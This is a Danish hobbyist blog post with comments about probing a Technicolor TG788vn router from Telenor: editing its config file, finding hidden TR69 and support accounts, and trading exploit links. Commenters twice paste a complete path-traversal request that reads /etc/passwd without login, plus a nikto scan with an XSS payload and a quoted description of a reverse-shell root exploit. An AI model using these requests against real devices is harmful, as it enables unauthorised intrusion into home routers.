LAN-blog

LAN-blog

Hack din TG788vn !

HakkeriPosted by Harleyman Tue, July 22, 2014 09:54:18
Jeg har her i min sommerferie rodet lidt med min nye Technicolor TG788vn v2 DSL router fra Telenor.
Spørgsmålet var primært :
Hvor sikker er den? (kan det gøres bedre?)
Kommer senere.... tænker Nessus/Nitro og Kali-linux smiley

Kan man ændre de skjulte funktionerne ? (hvad med VOIP?)

Det viser sig at man kan ændre config filen (hente -> ændre -> oploade)
Man finder config filen : Home > MediaAccess Gateway > Configuration > Backup & Restore
Start med : Backup current configuration

Du modtager en : user.ini - Man kan søge efter disable og enable og dermed styre hvad din router kan smiley Når du nu er færdig med at ændre dit setup : Restore saved configuration
Man man også ændre alle service porte og dermed lukke/ændre services...

Jeg fandt sjove ting som:

server config url=https://acs.telenor.dk:8443/tacs/TACSService

server config username=tacsuser1

server config password=_DEV3_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Det er desværre ikke lykkes at cracke passwordet smiley
En af de mere mystiske settings jeg faldt over i user.ini-filen var under "webfilter.ini"

standard category create id=0 name=Pornography type=category

Det er i skrivende stund uvist hvordan den bruges.... Opdateres når jeg ved mere !

Update :
*Et eksempel på user.ini filen(ikke telenor) : http://pastebin.com/raw.php?i=bKXA2QgK
*Ved at kigge i log-filen kan man se der er 2 brugere der ikke står andre steder i systemet. Brugerne : TR69 og support. som man kan se under "Home > MediaAccess Gateway > Event Logs"
"CONFIGURATION saved by TR69"
"LOGIN User support logged in on TELNET (212.242.47.140)"

  • Comments(16)

Fill in only if you are not real





The following XHTML tags are allowed: <b>, <br/>, <em>, <i>, <strong>, <u>. CSS styles and Javascript are not permitted.
Posted by Hax0r_bent Sat, November 18, 2017 23:15:56

Det ser ud til man kan XSS routeren og få de andre spændende brugere ud...

MediaAccess TG788vn with Cisco firewall http config is vulnerable to critical unauthenticated file disclosure flaw, POC Request: POST /scgi-bin/platform.cgi HTTP/1.1 Host: xx.xx.xx.xx Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: https://xx.xx.xx.xx/scgi-bin/platform.cgi Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 164 button.login.home=Se%20connecter&Login.userAgent=0x4148_Fu&reload=0&SSLVPNUser.Password=0x4148Fu&SSLVPNUser.UserName=0x4148&thispage=../../../../../../etc/passwd%00 Response: HTTP/1.0 200 OK Date: Sat, 01 Jan 2011 00:00:45 GMT Server: Embedded HTTP Server. Connection: close loic_ipsec:x:500:500:xauth:/:/bin/cli the http server is running with root privileges , which mean that the attacker might escalate the exploit for further critical attacks

Posted by Hax0r_bent Mon, May 15, 2017 14:27:47

Fandt et nyt "legetøj" der lige skal rettes til så den passer til 788 og de rigtige porte ;-)

Hentes her : https://github.com/reverse-shell/routersploit

Posted by Hax0r_bent Tue, February 21, 2017 19:32:23

Tror den har noget XSS issues... ;-)

nikto -Tuning 4 -C all -h http://10.0.0.1:2033

- Nikto v2.1.5

---------------------------------------------------------------------------

+ Target IP: 10.0.0.1

+ Target Hostname: 10.0.0.1

+ Target Port: 2033

+ Start Time: xxxxxxx

---------------------------------------------------------------------------

+ Server: No banner retrieved

+ The anti-clickjacking X-Frame-Options header is not present.

+ Cookie xAuth_SESSION_ID created without the httponly flag

+ Root page / redirects to: http://10.0.0.1:2033/login.lp

+ Server leaks inodes via ETags, header found with file /favicon.ico, fields: 0x57e 0x1af7e629

+ OSVDB-630: IIS may reveal its internal or real IP in the Location header via a request to the /images directory. The value is "http://127.0.0.1/images/".

+ Allowed HTTP Methods: OPTIONS, GET, POST

+ /postnuke/modules.php?op=modload&name=Web_Links&file=index&req=viewlinkdetails&lid=666&ttitle=Mocosoft Utilities\"%3<script>alert('Vulnerable')</script>: Postnuke Phoenix 0.7.2.3 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.

+ 413 items checked: 13 error(s) and 6 item(s) reported on remote host

---------------------------------------------------------------------------


Posted by tank Tue, October 11, 2016 11:55:02

Hacking en Billion Router 7700NR4 + andre med Remote Command Execution.
Bruges MEGET i øst Europa og kunne købes i flere computer butikker i DK.

info: https://www.exploit-db.com/exploits/40472/

De skriver :

# This router is a widely used here in Albania. It is given by a telecom provider to the home and bussiness users.

# The problem is that this router has hardcoded credentials which "can not be changed" by a normal user. Using these

# credentials we don't have to much access but the lack of authentication security we can download the backup and get the admin password.

# Using that password we can login to telnet server and use a shell escape to get a reverse root connection.

# You must change host with the target and reverse_ip with your attacking ip.

# Fix:

# The only fix is hacking your router with this exploit, changing the credentials and disabling all the other services using iptables.



Posted by tank Tue, July 26, 2016 14:41:40

Flere af de gode links om denne DSL router.

https://forum.openwrt.org/viewtopic.php?id=42054

http://wiki.openwrt.org/toh/thomson/tg789vn

http://heleo.nl/new-firmware-on-a-kpn-tg789ivn-modem-router/

http://www.dd-wrt.com/phpBB2/viewtopic.php?p=982065&sid=3f9585131dfc91a535b33d5a1922d300

Posted by Tank Tue, July 26, 2016 14:17:11

Spændende exploit
Technicolor TC7200 modem/router multiple vulnerabilities

https://www.exploit-db.com/exploits/40157/

http://www.search-lab.hu/advisories/secadv-20150720


Posted by Tank Fri, January 08, 2016 15:34:16

glemte lige
Fuld Exploit : https://www.exploit-db.com/exploits/39184/

Posted by Tank Fri, January 08, 2016 15:31:50

TG788 har et spændende hul man måske kunne bruge til at "fiske" data ud :

Request:

POST /scgi-bin/platform.cgi HTTP/1.1

Host: xx.xx.xx.xx

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate, br

Referer: https://xx.xx.xx.xx/scgi-bin/platform.cgi

Connection: keep-alive

Content-Type: application/x-www-form-urlencoded

Content-Length: 164

button.login.home=Se%20connecter&Login.userAgent=0x4148_Fu&reload=0&SSLVPNUser.Password=0x4148Fu&SSLVPNUser.UserName=0x4148&thispage=../../../../../../etc/passwd%00

Response:

HTTP/1.0 200 OK

Date: Sat, 01 Jan 2011 00:00:45 GMT

Server: Embedded HTTP Server.

Connection: close

loic_ipsec:x:500:500:xauth:/:/bin/cli

the http server is running with root privileges , which mean that the

attacker might escalate the exploit for further critical attacks


Posted by Comter Fri, November 13, 2015 21:47:34

Et godt bud er noget der minder om :
http://www.gnucitizen.org/blog/bt-home-flub-pwnin-the-bt-home-hub-4/

Posted by Comter Fri, November 13, 2015 21:39:15

Spændende læsning ;-)
Den kan XML...
http://10.0.0.1:2033/helpfiles/b_index.htm?anchor=b_bandr&file=xml/bConfiguration8.xml

Posted by CrispyK Wed, August 12, 2015 17:59:27

Hej folkens :)

Ser rigtig fedt ud det du har fået fingrene i der.

Har selv lige modtaget sådan en fra telenor og kunne godt tænke mig at rode lidt den.

Men som Batman siger så har de fjernet "backup&restore" muligheden.

Har du eller nogen en ide om hvordan man kan komme ind og enable de gemte menuer?

Havde en tg799vn v2 og der fandt jeg nogle links på andre sider som mere eller mindre så ud til at kunne give mig adgang til nogle af de gemte menuer ved at direkte indtaste menu url linket. Jeg kan ikke lige huske hvor de er men skal nok lige lede efter dem igen og smide dem ind her.

Problemet med min tg799vn v2 var at jeg ikke havde password til admin kontoen da jeg ikke fik den fra telia den gang og derfor kunne jeg ikke komme ind på den side/link. Den spurgte om
Username: Admin (der stod admin)
Paswword: >enter password< (skulle bare bruge password)


Men nu har jeg jo password fra telenor til min tg788vn v2 så det må vel kunne lade sig gøre at komme ind nu?

Skal nok lige komme ind og update nå jeg finder ud af mere :)

Ps: meget af det jeg fandt var på portugesisk og andre "sjove" sprog. Ikke ret meget på engelsk, og brugte flere dage på at researche google :P

Mail til mig hvis det er. krissprolls5250@gmail.com

Posted by Bent Hansen Mon, August 03, 2015 13:07:21

En google søgning på Firmware fortæller softwaren i routeren er opensource...
Hvilke betyder man kunne kigge på versionen af softwaren routeren kører...
http://www3.technicolor.com/en/hi/minisites/open-software

Posted by Bent Hansen Mon, August 03, 2015 12:58:21

Det ser ud til den type routere har sikkerheds issue... Måske noget man kunne kigge på ;-)
Se : http://www.cvedetails.com/vendor/11673/Technicolor.html

Posted by Harleyman Thu, June 18, 2015 09:21:04


Kan se de har fjernet muligheden efter en update i min router... Crap!

Så vi er ude i noget XSS af webserveren eller uPNP hack for at få adgang igen ;-)

Der er NMAP,Nessus,Metasploit,nikto( cirt.net/Nikto2 ) og evt. www.exploit-db.com din ven.

Har luret lidt på om man kan komme ind med brugeren TR69 eller support. Tror desværre der er noget firewall filter på smiley


Posted by Batman Wed, May 20, 2015 22:26:07

på min har de fjernet backup og restore option. Tror kun support har mulighed for at rette i min.
Ved du om man kan enable HFS+ muligheden under content sharing.

Posted by Glasius Thu, April 16, 2015 10:45:34

Hej

meget spændene læsning tror jeg skal kikke lidt på min